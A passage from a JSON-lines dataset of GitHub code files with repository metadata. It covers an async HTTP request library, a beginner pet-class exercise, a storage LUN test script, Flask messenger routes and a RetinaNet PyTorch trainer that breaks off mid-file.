((method, url, params, auth, headers, meta, proxy))\n\n\t# DNS query for caching and massive\n\tif not lifetime._polling and _dns_reqs < _workers:\n\t\thost = urlparse (url) [1].split (\":\")[0]\n\t\tif host not in _dns_query_req:\n\t\t\t_dns_query_req [host] = None\n\t\t\t_dns_reqs += 1\n\t\t\tadns.query (host, \"A\", callback = lambda x: None)\n\n\t\tif dns.qsize ():\n\t\t\tdns.pop_all ()\n\t\t\tasyncore.loop (0.1, count = 2)\n\t#print ('~~~~~~~~~~~~~~~', asyndns.pool.connections)\n\n\ndef log (msg, type = \"info\"):\n\tglobal _logger\n\t_logger (msg, type)\n\n#----------------------------------------------------\n# Add Reuqest (protocols.*.request) Object\n#----------------------------------------------------\ndef add (request):\n\tglobal _que\n\t_que.add (request)\n\n#----------------------------------------------------\n# HTTP CALL\n#----------------------------------------------------\ndef head (*args, **karg):\n\t_add ('head', *args, **karg)\n\ndef trace (*args, **karg):\n\t_add ('trace', *args, **karg)\n\ndef options (*args, **karg):\n\t_add ('options', *args, **karg)\n\ndef upload (*args, **karg):\n\t_add ('upload', *args, **karg)\n\ndef get (*args, **karg):\n\t_add ('get', *args, **karg)\n\ndef delete (*args, **karg):\n\t_add ('delete', *args, **karg)\n\ndef post (*args, **karg):\n\t_add ('post', *args, **karg)\n\ndef patch (*args, **karg):\n\t_add ('patch', *args, **karg)\n\ndef put (*args, **karg):\n\t_add ('put', *args, **karg)\n\n\ndef getjson (*args, **karg):\n\t_add ('getjson', *args, **karg)\n\ndef deletejson (*args, **karg):\n\t_add ('deletejson', *args, **karg)\n\ndef patchjson (*args, **karg):\n\t_add ('patchjson', *args, **karg)\n\ndef postjson (*args, **karg):\n\t_add ('postjson', *args, **karg)\n\ndef putjson (*args, **karg):\n\t_add ('putjson', *args, **karg)\n\n\ndef getxml (*args, **karg):\n\t_add ('getxml', *args, **karg)\n\ndef deletexml (*args, **karg):\n\t_add ('deletexml', *args, **karg)\n\ndef patchxml (*args, **karg):\n\t_add ('patchxml', *args, **karg)\n\ndef postxml (*args, **karg):\n\t_add ('postxml', *args, **karg)\n\ndef putxml (*args, **karg):\n\t_add ('putxml', *args, **karg)\n\n\n#----------------------------------------------------\n# Websocket\n#----------------------------------------------------\ndef ws (*args, **karg):\n\t_add ('ws', *args, **karg)\n\ndef wss (*args, **karg):\n\t_add ('wss', *args, **karg)\n\n\n#----------------------------------------------------\n# XMLRPC, gRPC\n#----------------------------------------------------\ndef _addrpc (method, rpcmethod, params, url, auth = None, headers = {}, callback = None, meta = {}, proxy = None):\n\t_add (method, url, (rpcmethod, params), auth, headers, callback, meta, proxy)\n\ndef rpc\t(*args, **karg):\n\treturn stubproxy.Proxy ('rpc', _addrpc, *args, **karg)\n\ndef jsonrpc\t(*args, **karg):\n\treturn stubproxy.Proxy ('jsonrpc', _addrpc, *args, **karg)\n\ndef grpc\t(*args, **karg):\n\treturn stubproxy.Proxy ('grpc', _addrpc, *args, **karg)\n\n#----------------------------------------------------\n# DBO QEURY\n#----------------------------------------------------\ndef _adddbo (method, dbmethod, params, server, dbname = None, auth = None, callback = None, meta = {}):\n\tglobal _que\n\n\tif not _initialized:\n\t\tconfigure ()\n\tif not meta: meta = {}\n\tmeta ['req_id'] = _que.req_id\n\tmeta ['req_method'] = method\n\tmeta ['req_callback'] = callback\n\n\t_que.add ((method, server, (dbmethod, params), dbname, auth, meta))\n\ndef postgresql (*args, **karg):\n\treturn stubproxy.Proxy ('postgresql', _adddbo, *args, **karg)\npgsql = pg = postgresql\n\ndef redis (*args, **karg):\n\treturn stubproxy.Proxy ('redis', _adddbo, *args, **karg)\n\ndef mongodb (*args, **karg):\n\treturn stubproxy.Proxy ('mongodb', _adddbo, *args, **karg)\n\ndef sqlite3 (*args, **karg):\n\treturn stubproxy.Proxy ('sqlite3', _adddbo, *args, **karg)\n\n","repo_name":"hansroh/aquests","sub_path":"aquests/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":14635,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"47"} +{"seq_id":"35638237582","text":"from pet import Pet\n\nclass Ninja:\n def __init__(self,first_name,last_name,pet,treats):\n self.first_name = first_name\n self.last_name = last_name\n self.pet = pet\n self.treats = treats\n self.pet_food = 80\n \n def walk(self):\n self.pet.play()\n return self\n \n def feed(self):\n if (self.pet_food > 0):\n self.pet_food -= 50 \n self.pet.eat()\n \n else:\n print(\"sorry no food for you\")\n return self\n \n def bathe(self):\n self.pet.noises()\n return self\n \n \n\n\nlola = Pet(\"Lola\", \"Dog\",\"all of them\",\"bark\")\nprint(lola.name)\nsam = Ninja(\"Sam\",\"Ghanem\",lola,\"bully sticks\")\nsam.feed()\nprint(lola.health)\nprint(lola.energy)\n\nsam.bathe()\n\nsam.feed()\nprint(lola.health)\nprint(lola.energy)\n\nsam.walk()\nprint(lola.health)\nprint(lola.energy)","repo_name":"SamGhanem/python","sub_path":"dojo_pets/file.py","file_name":"file.py","file_ext":"py","file_size_in_byte":878,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"13332980773","text":"# PREREQUISITES,\n# Need stord to be started with ha port 9000\n#./src/stord/./stord -etcd_ip=\"http://127.0.0.1:2379\" -stord_version=\"v1.0\" -svc_label=\"stord_svc\" -ha_svc_port=9000\n# Need tgtd to be started with ha port 9001\n#./usr/tgtd -f -e \"http://127.0.0.1:2379\" -s \"tgt_svc\" -v \"v1.0\" -p 9001 -D \"127.0.0.1\" -P 9876\n\nimport json\nimport requests\nimport time\nimport sys\nimport os\n\nfrom collections import OrderedDict\nfrom urllib.parse import urlencode\n\nh = \"http\"\ncert = None\n\nAeroClusterID=\"1\"\nTargetName=\"tgt1\"\nTargetName_D=\"%s\" %TargetName\n\nVmId=\"1\"\nVmdkID=\"2\"\nTargetID=\"%s\" %VmId\nLunID=\"%s\" %VmdkID\nFileTarget=\"/tmp/hyc/\"\ncreatefile=\"false\"\nDevTarget=\"/dev/sde\"\n\nsize_in_gb=\"1\" #Size in GB\nsize_in_bytes=int(size_in_gb) * int(1024) * int(1024) * int(1024)\n\nDevName=\"iscsi-%s-disk_%s\" %(TargetName, LunID)\nDevPath=\"/var/hyc/%s\" %(DevName)\ncmd=\"truncate --size=%sG %s\" %(size_in_gb, DevPath)\n\nprint (\"DevPath: %s\" %DevPath)\nprint (\"Cmd: %s\" %cmd)\nos.system(cmd);\n\nif len(sys.argv) > 1:\n if sys.argv[1].lower() == \"https\" :\n import urllib3\n urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\n h = \"https\"\n cert=('./cert/cert.pem', './cert/key.pem')\n\nheaders = {'Content-type': 'application/json'}\nparams = OrderedDict([('first', 1), ('second', 2), ('third', 3)])\ndata = { \"service_type\": \"test_server\", \"service_instance\" : 0, \"etcd_ips\" : [\"3213213\", \"213213\"]}\n\n# POST call 3 to stord_svc\nprint (\"Send POST stord_svc new_vmdk 1\")\nparent = False\nif parent == True:\n\tdata2 = {\"TargetID\":\"%s\" %TargetID,\"LunID\":\"%s\" %LunID,\"DevPath\":\"%s\" %DevPath,\"VmID\":\"%s\" %VmId, \"VmdkID\":\"%s\" %VmdkID,\"BlockSize\":\"4096\", \"ParentDiskName\":\"set10\", \"ParentDiskVmdkID\" : \"12\", \"Compression\":{\"Enabled\":\"false\"},\"Encryption\":{\"Enabled\":\"false\"},\"RamCache\":{\"Enabled\":\"false\",\"MemoryInMB\":\"1024\"},\"FileCache\":{\"Enabled\":\"false\"},\"SuccessHandler\":{\"Enabled\":\"false\"}, \"FileTarget\":{\"Enabled\":\"true\",\"CreateFile\":\"%s\" %createfile, \"TargetFilePath\":\"%s\" %DevTarget,\"TargetFileSize\":\"%s\" %size_in_bytes}, \"CleanupOnWrite\":\"true\"}\nelse:\n\tdata2 = {\"TargetID\":\"%s\" %TargetID,\"LunID\":\"%s\" %LunID,\"DevPath\":\"%s\" %DevPath,\"VmID\":\"%s\" %VmId, \"VmdkID\":\"%s\" %VmdkID,\"BlockSize\":\"4096\", \"Compression\":{\"Enabled\":\"false\"},\"Encryption\":{\"Enabled\":\"false\"},\"RamCache\":{\"Enabled\":\"false\",\"MemoryInMB\":\"1024\"},\"FileCache\":{\"Enabled\":\"false\"},\"SuccessHandler\":{\"Enabled\":\"false\"}, \"FileTarget\":{\"Enabled\":\"true\",\"CreateFile\":\"%s\" %createfile, \"TargetFilePath\":\"%s\" %DevTarget,\"TargetFileSize\":\"%s\" %size_in_bytes}, \"CleanupOnWrite\":\"true\"}\n\nr = requests.post(\"%s://127.0.0.1:9000/stord_svc/v1.0/new_vmdk/?vm-id=%s&vmdk-id=%s\" % (h,VmId,VmdkID), data=json.dumps(data2), headers=headers, cert=cert, verify=False)\nassert (r.status_code == 200)\n\n# POST call 5 to tgt_svc\nprint (\"Send POST tgt_svc lun_create %s\" %LunID)\ndata2 = {\"DevName\": \"%s\" %(DevName), \"VmID\":\"%s\" %VmId, \"VmdkID\":\"%s\" %VmdkID, \"LunSize\":\"%s\" %size_in_gb}\nr = requests.post(\"%s://127.0.0.1:9001/tgt_svc/v1.0/lun_create/?tid=%s&lid=%s\" % (h, TargetID, LunID), data=json.dumps(data2), headers=headers, cert=cert, verify=False)\nassert (r.status_code == 200)\n","repo_name":"CacheboxInc/tgt-test-tool","sub_path":"src/tests/utils/add_lun.py","file_name":"add_lun.py","file_ext":"py","file_size_in_byte":3133,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"40108358390","text":"import json\nfrom types import SimpleNamespace\n\ndef make_config(json_string):\n config = json.loads(json_string, object_hook=lambda d: SimpleNamespace(**d))\n config.name = f'{config.activation}_{config.solver}_{config.limit}'\n config.model_save = f\"./{config.target}/model_{config.name}.bin\"\n config.data_dir = f'./{config.target}/data'\n config.dataset_save = f'./{config.target}/dataset_{config.name}.bin'\n return config\n","repo_name":"erikschmutz/kex","sub_path":"backend-app/scripts/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"10937538463","text":"\"\"\"Comcat messenger.\"\"\"\n\nfrom flask import request\n\nfrom ccmessenger import get_customer_message\nfrom ccmessenger import get_customer_messages\nfrom ccmessenger import get_user_message\nfrom ccmessenger import get_user_messages\nfrom ccmessenger import CustomerMessage\nfrom ccmessenger import UserMessage\nfrom his import CUSTOMER, authenticated, authorized\nfrom wsgilib import JSON, JSONMessage\n\nfrom dscms4.comcat.functions import get_user\nfrom dscms4.fcm import notify_customer_message\n\n\n__all__ = [\"ROUTES\"]\n\n\n@authenticated\n@authorized(\"comcat\")\ndef sent_messages() -> JSON:\n \"\"\"Lists sent messages.\"\"\"\n\n return JSON(\n [message.to_json() for message in get_customer_messages(sender=CUSTOMER.id)]\n )\n\n\n@authenticated\n@authorized(\"comcat\")\ndef received_messages() -> JSON:\n \"\"\"Lists received messages.\"\"\"\n\n return JSON(\n [message.to_json() for message in get_user_messages(recipient=CUSTOMER.id)]\n )\n\n\n@authenticated\n@authorized(\"comcat\")\ndef show_conversation(user: int) -> JSON:\n \"\"\"Shows the conversation with a user.\"\"\"\n\n return JSON(\n [\n message.to_json()\n for message in get_user_messages(sender=user, recipient=CUSTOMER.id)\n ]\n )\n\n\n@authenticated\n@authorized(\"comcat\")\ndef send_message() -> JSONMessage:\n \"\"\"Write a new message.\"\"\"\n\n message = CustomerMessage(\n sender=CUSTOMER.id,\n recipient=get_user(request.json.get(\"user\"), CUSTOMER.id),\n text=request.json[\"text\"],\n )\n message.save()\n notify_customer_message(message)\n return JSONMessage(\"Message sent.\", id=message.id, status=201)\n\n\n@authenticated\n@authorized(\"comcat\")\ndef delete_own_message(ident: int) -> JSONMessage:\n \"\"\"Deletes a sent message.\"\"\"\n\n try:\n message = get_customer_message(ident, sender=CUSTOMER.id)\n except CustomerMessage.DoesNotExist:\n return JSONMessage(\"No such message.\", status=404)\n\n message.delete_instance()\n return JSONMessage(\"Message deleted.\", status=200)\n\n\n@authenticated\n@authorized(\"comcat\")\ndef delete_user_message(ident: int) -> JSONMessage:\n \"\"\"Deletes a user message.\"\"\"\n\n try:\n message = get_user_message(ident, recipient=CUSTOMER.id)\n except UserMessage.DoesNotExist:\n return JSONMessage(\"No such message.\", status=404)\n\n message.delete_instance()\n return JSONMessage(\"Message deleted.\", status=200)\n\n\nROUTES = [\n ([\"GET\"], \"/messenger/sent\", sent_messages),\n ([\"GET\"], \"/messenger/received\", received_messages),\n ([\"GET\"], \"/messenger/conversation/\", show_conversation),\n ([\"POST\"], \"/messenger/send\", send_message),\n ([\"DELETE\"], \"/messenger/delete-own/\", delete_own_message),\n ([\"DELETE\"], \"/messenger/delete-user-msg/\", delete_user_message),\n]\n","repo_name":"homeinfogmbh/dscms4","sub_path":"dscms4/comcat/messenger.py","file_name":"messenger.py","file_ext":"py","file_size_in_byte":2775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"2433552774","text":"'''\n RetinaNet trainer for PyTorch.\n\n 2019-21 Benjamin Kellenberger\n'''\n\nimport io\nimport json\nfrom tqdm import tqdm\nimport torch\nfrom torch.utils.data import DataLoader\n\nfrom ..genericPyTorchModel import GenericPyTorchModel\n\nfrom ..functional._retinanet import DEFAULT_OPTIONS, collation, encoder, loss\nfrom ..functional._retinanet.model import RetinaNet as Model\nfrom ..functional.datasets.bboxDataset import BoundingBoxesDataset\nfrom util.helpers import get_class_executable\nfrom util import optionsHelper\n\n\n'''\n Map between new (GUI-enhanced) and old options JSON format fields.\n In the new format, all options are rooted under \"options\".\n'''\nOPTIONS_MAPPING = {\n 'general.device.value': 'general.device',\n 'general.seed.value': 'general.seed',\n 'model.backbone.value': 'model.kwargs.backbone',\n 'model.pretrained.value': 'model.kwargs.pretrained',\n 'model.out_planes.value': 'model.kwargs.out_planes',\n 'model.convertToInstanceNorm.value': 'model.kwargs.convertToInstanceNorm',\n 'train.dataLoader.shuffle.value': 'train.dataLoader.kwargs.shuffle',\n 'train.dataLoader.batch_size.value': 'train.dataLoader.kwargs.batch_size',\n 'train.criterion.gamma.value': 'train.criterion.kwargs.gamma',\n 'train.criterion.alpha.value': 'train.criterion.kwargs.alpha',\n 'train.criterion.background_weight.value': 'train.criterion.kwargs.background_weight',\n 'train.ignore_unsure': 'train.ignore_unsure',\n 'inference.dataLoader.batch_size.value': 'inference.dataLoader.kwargs.batch_size'\n\n # optimizer and transforms are treated separately\n}\n\n\nclass RetinaNet(GenericPyTorchModel):\n\n model_class = Model\n\n def __init__(self, project, config, dbConnector, fileServer, options):\n super(RetinaNet, self).__init__(project, config, dbConnector, fileServer, options)\n\n self.model_class = Model\n\n\n ''' Model options parsing and verification functionalities '''\n\n @staticmethod\n def getDefaultOptions():\n jsonFile = 'config/ai/model/pytorch/boundingBoxes/retinanet.json'\n try:\n # try to load defaults from JSON file first\n options = json.load(open(jsonFile, 'r'))\n except Exception as e:\n # error; fall back to built-in defaults\n print(f'Error reading default RetinaNet options file \"{jsonFile}\" (message: \"{str(e)}\"), falling back to built-in options.')\n options = DEFAULT_OPTIONS\n \n # expand options\n options = optionsHelper.substitute_definitions(options)\n\n return options\n\n\n @staticmethod\n def _convertOldOptions(options, defaults):\n '''\n Receives options in the previous JSON encoding\n and converts them to the new GUI-enhanced scheme.\n Returns the new, converted options accordingly.\n '''\n newOptions = defaults.copy()\n\n warnings = []\n \n # update defaults key by key\n for key in OPTIONS_MAPPING.keys():\n newTokens = ['options']\n newTokens.extend(key.split('.'))\n oldTokens = OPTIONS_MAPPING[key].split('.')\n oldValue = optionsHelper.get_hierarchical_value(options, oldTokens, None)\n if oldValue is None:\n warnings.append(f'Value for options \"{key}\" could not be found in given options (expected location: \"{OPTIONS_MAPPING[key]}\").')\n else:\n optionsHelper.set_hierarchical_value(newOptions, newTokens, oldValue)\n\n # take special care of the optimizer: try all possible values (only the ones present will be retained)\n currentOptimType = options['train']['optim']['class']\n optionsHelper.set_hierarchical_value(newOptions, ('train','optim','value'), currentOptimType)\n optionsHelper.update_hierarchical_value(options, newOptions, ('train','optim','options',currentOptimType,'lr','value'), ('train', 'optim', 'kwargs', 'lr'))\n optionsHelper.update_hierarchical_value(options, newOptions, ('train','optim','options',currentOptimType,'weight_decay','value'), ('train', 'optim', 'kwargs', 'weight_decay'))\n optionsHelper.update_hierarchical_value(options, newOptions, ('train','optim','options',currentOptimType,'momentum','value'), ('train', 'optim', 'kwargs', 'momentum'))\n optionsHelper.update_hierarchical_value(options, newOptions, ('train','optim','options',currentOptimType,'alpha','value'), ('train', 'optim', 'kwargs', 'alpha'))\n optionsHelper.update_hierarchical_value(options, newOptions, ('train','optim','options',currentOptimType,'centered','value'), ('train', 'optim', 'kwargs', 'centered'))\n optionsHelper.update_hierarchical_value(options, newOptions, ('train','optim','options',currentOptimType,'dampening','value'), ('train', 'optim', 'kwargs', 'dampening'))\n optionsHelper.update_hierarchical_value(options, newOptions, ('train','optim','options',currentOptimType,'nesterov','value'), ('train', 'optim', 'kwargs', 'nesterov'))\n\n # also take special care of the transforms\n def _update_transforms(currentTransforms):\n newTransforms = []\n for tr in currentTr_train:\n # get from template definition and then replace values\n trClass = tr['class']\n if trClass not in newOptions['defs']['transform']:\n warnings.append(f'Transform \"{trClass}\" is not defined in the new scheme and will be substituted appropriately.')\n continue\n newTr = newOptions['defs']['transform'][trClass]\n for kw in tr['kwargs'].keys():\n if kw == 'size':\n newTr['width']['value'] = tr['kwargs']['size'][0]\n newTr['height']['value'] = tr['kwargs']['size'][1]\n elif kw in ('brightness', 'contrast', 'saturation', 'hue'):\n newTr[kw]['minV']['value'] = 0\n newTr[kw]['maxV']['value'] = tr['kwargs'][kw]\n warnings.append(f'{kw} values of transforms have been set as maximums (min: 0).')\n elif kw in ('mean', 'std'):\n newTr['mean']['r'] = tr['kwargs'][kw][0]\n newTr['mean']['g'] = tr['kwargs'][kw][1]\n newTr['mean']['b'] = tr['kwargs'][kw][2]\n elif kw in newTr:\n newTr[kw]['value'] = tr['kwargs'][kw]\n newTransforms.append(newTr)\n return newTransforms\n\n currentTr_train = options['train']['transform']['kwargs']['transforms']\n newTr_train = _update_transforms(currentTr_train)\n newOptions['options']['train']['transform']['value'] = newTr_train\n\n currentTr_inference = options['inference']['transform']['kwargs']['transforms']\n newTr_inference = _update_transforms(currentTr_inference)\n newOptions['options']['inference']['transform']['value'] = newTr_inference\n\n print('Old RetinaNet options successfully converted to new format.')\n return newOptions, warnings\n \n\n @staticmethod\n def _verify_transforms(transforms, allowGeometric=True):\n warnings, errors = [], []\n transforms_PIL_new, transforms_tensor_new = [], []\n currentInputType = None # to keep track of transform order\n for tr in transforms:\n if isinstance(tr, str):\n # only an ID provided; encapsulate\n warnings.append(f'Using default arguments for transform \"{tr}\"')\n tr = {\n 'id': tr\n }\n trID = tr['id']\n trName = (tr['name'] if 'name' in tr else trID)\n \n if trID == 'ai.models.pytorch.boundingBoxes.DefaultTransform':\n if 'transform' in tr:\n newTr, newWarn, newErr = RetinaNet._verify_transforms(\n [tr['transform']], allowGeometric)\n transforms_PIL_new.extend(newTr) #TODO: Compose could contain mixed transforms\n warnings.extend(newWarn)\n errors.extend(newErr)\n else:\n warnings.append(f'Default transform \"{trName}\" contains no sub-transform and will be skipped.')\n\n elif trID == 'ai.models.pytorch.boundingBoxes.Compose':\n if 'transforms' in tr:\n newTr, newWarn, newErr = RetinaNet._verify_transforms(\n tr['transforms'], allowGeometric)\n transforms_PIL_new.extend(newTr) #TODO: Compose could contain mixed transforms\n warnings.extend(newWarn)\n errors.extend(newErr)\n else:\n warnings.append(f'Compose transform \"{trName}\" contains no sub-transforms and will be skipped.')\n\n if trID in (\n 'torchvision.transforms.Normalize',\n 'torchvision.transforms.RandomErasing'\n ):\n # transforms on torch.tensor; these come at the end\n transforms_tensor_new.append({\n 'id': 'ai.models.pytorch.boundingBoxes.DefaultTransform',\n 'transform': tr\n })\n if currentInputType is not None and currentInputType != 'tensor':\n warnings.append(f'Transform \"{trName}\" operates on Torch.tensor, but current input is PIL.Image. Transforms might be reordered.')\n currentInputType = 'tensor'\n\n elif trID in (\n 'ai.models.pytorch.boundingBoxes.RandomHorizontalFlip',\n 'ai.models.pytorch.boundingBoxes.RandomFlip'\n ):\n # geometric transforms on PIL.Image\n if not allowGeometric:\n warnings.append(f'Transform \"{trName}\" modifies the image geometrically, which is not allowed here. The transform is being skipped.')\n continue\n transforms_PIL_new.append(tr)\n if currentInputType is not None and currentInputType != 'image':\n warnings.append(f'Transform \"{trName}\" operates on PIL images, but current input is Torch.tensor. Transforms might be reordered.')\n currentInputType = 'image'\n \n elif trID in (\n 'ai.models.pytorch.boundingBoxes.Resize',\n 'torchvision.transforms.ColorJitter',\n 'torchvision.transforms.Grayscale',\n 'torchvision.transforms.RandomGrayscale'\n ):\n # non-geometric (+ always allowed resize) transforms on PIL.Image\n transforms_PIL_new.append({\n 'id': 'ai.models.pytorch.boundingBoxes.DefaultTransform',\n 'transform': tr\n })\n if currentInputType is not None and currentInputType != 'image':\n warnings.append(f'Transform \"{trName}\" operates on PIL images, but current input is Torch.tensor. Transforms might be reordered.')\n currentInputType = None # reset\n\n elif trID in (\n 'ai.models.pytorch.boundingBoxes.RandomClip',\n 'ai.models.pytorch.boundingBoxes.RandomSizedClip'\n ):\n # transforms that work on both PIL.Image and torch.tensor\n if currentInputType == 'tensor':\n transforms_tensor_new.append(tr)\n else:\n transforms_PIL_new.append(tr)\n\n else:\n # unsupported transform\n warnings.append(f'Transform \"{trName}\" is not a recognized option and will be skipped.')\n\n # assemble transforms\n transforms_out = transforms_PIL_new\n\n # insert a ToTensor operation at the right location\n transforms_out.append({\n 'id': 'ai.models.pytorch.boundingBoxes.DefaultTransform',\n 'transform': 'torchvision.transforms.ToTensor'\n })\n transforms_out.extend(transforms_tensor_new)\n return transforms_out, warnings, errors\n\n\n @staticmethod\n def verifyOptions(options):\n # get default options to compare to\n defaultOptions = RetinaNet.getDefaultOptions()\n\n # updated options with modifications made\n if options is None:\n updatedOptions = defaultOptions.copy()\n else:\n if not isinstance(options, dict):\n try:\n options = json.loads(options)\n except Exception as e:\n return {\n 'valid': False,\n 'warnings': [],\n 'errors': [\n f'Options are not in valid JSON format (message: \"{str(e)}\").'\n ]\n }\n updatedOptions = options.copy()\n\n result = {\n 'valid': True,\n 'warnings': [],\n 'errors': []\n }\n\n if not 'defs' in updatedOptions:\n # old version (without GUI formatting): convert first\n updatedOptions, warnings = RetinaNet._convertOldOptions(updatedOptions, defaultOptions)\n result['warnings'].append('Options have been converted to new format.')\n result['warnings'].extend(warnings)\n\n # flatten and fill globals\n updatedOptions = optionsHelper.substitute_definitions(updatedOptions)\n\n # do the verification\n missingClassOptions = optionsHelper.get_hierarchical_value(updatedOptions, ['options', 'general', 'labelClasses'])\n if not isinstance(missingClassOptions, dict):\n updatedOptions['options']['general']['labelClasses'] = \\\n optionsHelper.get_hierarchical_value(defaultOptions, ['options', 'general', 'labelClasses'])\n #TODO: verify rest\n\n # verify transforms\n transforms_train = updatedOptions['options']['train']['transform']['value']\n transforms_train, w, e = RetinaNet._verify_transforms(transforms_train, True)\n result['warnings'].extend(w)\n result['errors'].extend(e)\n if transforms_train is None:\n result['valid'] = False\n else:\n updatedOptions['options']['train']['transform']['value'] = transforms_train\n\n transforms_inf = updatedOptions['options']['inference']['transform']['value']\n transforms_inf, w, e = RetinaNet._verify_transforms(transforms_inf, False)\n result['warnings'].extend(w)\n result['errors'].extend(e)\n if transforms_inf is None:\n result['valid'] = False\n else:\n updatedOptions['options']['inference']['transform']['value'] = transforms_inf\n\n if result['valid']:\n result['options'] = updatedOptions\n\n return result\n\n\n @staticmethod\n def _init_transform_instances(transform, imageSize):\n '''\n Receives a list of transform definition dicts (or names)\n that are to be applied in order (either during training or\n for inference), and creates class instances for all of them.\n Also prepends a \"Resize\" operation (with the given image size)\n as well as a \"DefaultTransform\" with a \"ToTensor\" operation,\n to convert the image to a torch.Tensor instance.\n Returns a \"Compose\" transform with all the specified transforms\n in order.\n '''\n transforms = [{\n 'id': 'ai.models.pytorch.boundingBoxes.Resize',\n 'size': imageSize\n }]\n transforms.extend(transform)\n\n # check if \"ToTensor\" is needed\n hasToTensor = False\n for tr in transform:\n if tr['id'].endswith('DefaultTransform'):\n if (isinstance(tr['transform'], str) and tr['transform'].endswith('ToTensor')) or \\\n (isinstance(tr['transform'], dict) and tr['transform']['id'].endswith('ToTensor')):\n hasToTensor = True\n break\n\n if not hasToTensor:\n transforms.append({\n 'id': 'ai.models.pytorch.boundingBoxes.DefaultTransform',\n 'transform': {\n 'id': 'torchvision.transforms.ToTensor'\n }\n })\n transformsList = [{\n 'id': 'ai.models.pytorch.boundingBoxes.Compose',\n 'transforms': transforms\n }]\n transform_instances = GenericPyTorchModel.parseTransforms(transformsList)[0]\n return transform_instances\n\n\n\n\n ''' Model training and inference functionalities '''\n\n def train(self, stateDict, data, updateStateFun):\n '''\n Initializes a model based on the given stateDict and a data loader from the\n provided data and trains the model, taking into account the parameters speci-\n fied in the 'options' given to the class.\n Returns a serializable state dict of the resulting model.\n '''\n # initialize model\n model, labelclassMap = self.initializeModel(stateDict, data,\n optionsHelper.get_hierarchical_value(self.options, ['options', 'general', 'labelClasses', 'add_missing', 'value']),\n optionsHelper.get_hierarchical_value(self.options, ['options', 'general', 'labelClasses', 'remove_obsolete', 'value']))\n\n # setup transform, data loader, dataset, optimizer, criterion\n inputSize = (int(optionsHelper.get_hierarchical_value(self.options, ['options', 'general', 'imageSize', 'width', 'value'])),\n int(optionsHelper.get_hierarchical_value(self.options, ['options', 'general', 'imageSize', 'height', 'value'])))\n \n transform = RetinaNet._init_transform_instances(\n optionsHelper.get_hierarchical_value(self.options, ['options', 'train', 'transform', 'value']),\n inputSize\n )\n\n dataset = BoundingBoxesDataset(data=data,\n fileServer=self.fileServer,\n labelclassMap=labelclassMap,\n targetFormat='xyxy',\n transform=transform,\n ignoreUnsure=optionsHelper.get_hierarchical_value(self.options, ['options', 'train', 'encoding', 'ignore_unsure', 'value'], fallback=False))\n\n dataEncoder = encoder.DataEncoder(\n minIoU_pos=optionsHelper.get_hierarchical_value(self.options, ['options', 'train', 'encoding', 'minIoU_pos', 'value'], fallback=0.5),\n maxIoU_neg=optionsHelper.get_hierarchical_value(self.options, ['options', 'train', 'encoding', 'maxIoU_neg', 'value'], fallback=0.4)\n )\n collator = collation.Collator(self.project, self.dbConnector, (inputSize[1], inputSize[0],), dataEncoder)\n dataLoader = DataLoader(\n dataset=dataset,\n collate_fn=collator.collate_fn,\n shuffle=optionsHelper.get_hierarchical_value(self.options, ['options', 'train', 'dataLoader', 'shuffle', 'value'], fallback=True)\n )\n\n # optimizer\n optimArgs = optionsHelper.get_hierarchical_value(self.options, ['options', 'train', 'optim', 'value'], None)\n optimArgs_out = {}\n optimClass = get_class_executable(optimArgs['id'])\n for key in optimArgs.keys():\n if key not in optionsHelper.RESERVED_KEYWORDS:\n optimArgs_out[key] = optionsHelper.get_hierarchical_value(optimArgs[key], ['value'])\n optimizer = optimClass(params=model.parameters(), **optimArgs_out)\n\n # loss criterion\n critArgs = optionsHelper.get_hierarchical_value(self.options, ['options', 'train', 'criterion'], None)\n critArgs_out = {}\n for key in critArgs.keys():\n if key not in optionsHelper.RESERVED_KEYWORDS:\n critArgs_out[key] = optionsHelper.get_hierarchical_value(critArgs[key], ['value'])\n criterion = loss.FocalLoss(**critArgs_out)\n\n # train model\n device = self.get_device()\n seed = int(optionsHelper.get_hierarchical_value(self.options, ['options', 'general', 'seed', 'value'], fallback=0))\n torch.manual_seed(seed)\n if 'cuda' in device:\n torch.cuda.manual_seed(seed)\n model.to(device)\n imgCount = 0\n for (img, bboxes_target, labels_target, fVec, _) in tqdm(dataLoader):\n img, bboxes_target, labels_target = img.to(device), \\\n bboxes_target.to(device), \\\n labels_target.to(device)\n\n optimizer.zero_grad()\n bboxes_pred, labels_pred = model(img)\n loss_value = criterion(bboxes_pred, bboxes_target, labels_pred, labels_target)\n loss_value.backward()\n optimizer.step()\n\n # check for Inf and NaN values and raise exception if needed\n if any([\n torch.any(torch.isinf(bboxes_pred)).item(),\n torch.any(torch.isinf(labels_pred)).item(),\n torch.any(torch.isnan(bboxes_pred)).item(),\n torch.any(torch.isnan(labels_pred)).item()\n ]):\n raise Exception('Model produced Inf and/or NaN values; training was aborted. Try reducing the learning rate.')\n\n # update worker state\n imgCount += img.size(0)\n updateStateFun(state='PROGRESS', message='training', done=imgCount, total=len(dataLoader.dataset))\n\n # all done; return state dict as bytes\n return self.exportModelState(model)\n\n \n def inference(self, stateDict, data, updateStateFun):\n\n # initialize model\n if stateDict is None:\n raise Exception('No trained model state found, but required for inference.')\n\n # read state dict from bytes\n model, labelclassMap = self.initializeModel(stateDict, data)\n\n # initialize data loader, dataset, transforms\n inputSize = (int(optionsHelper.get_hierarchical_value(self.options, ['options', 'general', 'imageSize', 'width', 'value'])),\n int(optionsHelper.get_hierarchical_value(self.options, ['options', 'general', 'imageSize', 'height', 'value'])))\n \n transform = RetinaNet._init_transform_instances(\n optionsHelper.get_hierarchical_value(self.options, ['options', 'inference', 'transform', 'value']),\n inputSize\n )\n \n dataset = BoundingBoxesDataset(data=data,\n fileServer=self.fileServer,\n labelclassMap=labelclassMap,\n transform=transform)\n dataEncoder = encoder.DataEncoder(minIoU_pos=0.5, maxIoU_neg=0.4) # IoUs don't matter for inference\n collator = collation.Collator(self.project, self.dbConnector, (inputSize[1], inputSize[0],), dataEncoder)\n dataLoader = DataLoader(\n dataset=dataset,\n 